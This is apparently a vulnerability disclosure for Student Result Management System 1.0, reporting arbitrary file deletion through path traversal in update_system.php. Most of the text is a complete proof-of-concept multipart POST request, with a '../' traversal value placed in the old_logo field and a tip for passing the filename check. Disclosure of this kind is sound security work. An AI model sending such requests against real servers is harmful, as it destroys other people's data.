BUG_Author: s0l42
Affected Version: Student Result Management System≤ 1.0
Vendor: SRMS
Software: SRMS
Vulnerability Files:
script\\admin\\core\\update_system.phpImproper unlink used in update_system.php, the system use unlink to delete old logo without any check. Attacker can use a path traversal to delete all the file in file system.
To proof the vulnerability, we create a file ~/testrm/1
Modify the field old_logo in http request as the target file
The file 1 is deleted by this request.
POST /admin/core/update_system HTTP/1.1
Host: xxxx
Content-Length: 20545
Cache-Control: max-age=0
Origin: xxxx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAEFTSeAnMdImGesT
Upgrade-Insecure-Requests: 1
User-Agent: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: xxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: xxxx
Connection: keep-alive
------WebKitFormBoundaryAEFTSeAnMdImGesT
Content-Disposition: form-data; name="name"
MAKUMBUSHO SECONDARY SCHOOL
------WebKitFormBoundaryAEFTSeAnMdImGesT
Content-Disposition: form-data; name="company_logo"; filename="1.jpg"
Content-Type: image/jpeg
<jpg file>
------WebKitFormBoundaryAEFTSeAnMdImGesT
Content-Disposition: form-data; name="old_logo"
../../../../../home/xxx/testrm/1 (<the target you want to delete>)
------WebKitFormBoundaryAEFTSeAnMdImGesT
Content-Disposition: form-data; name="submit"
1
------WebKitFormBoundaryAEFTSeAnMdImGesT--
Attention: There is a check of filename, so company_logo ’s name should not be null or “”
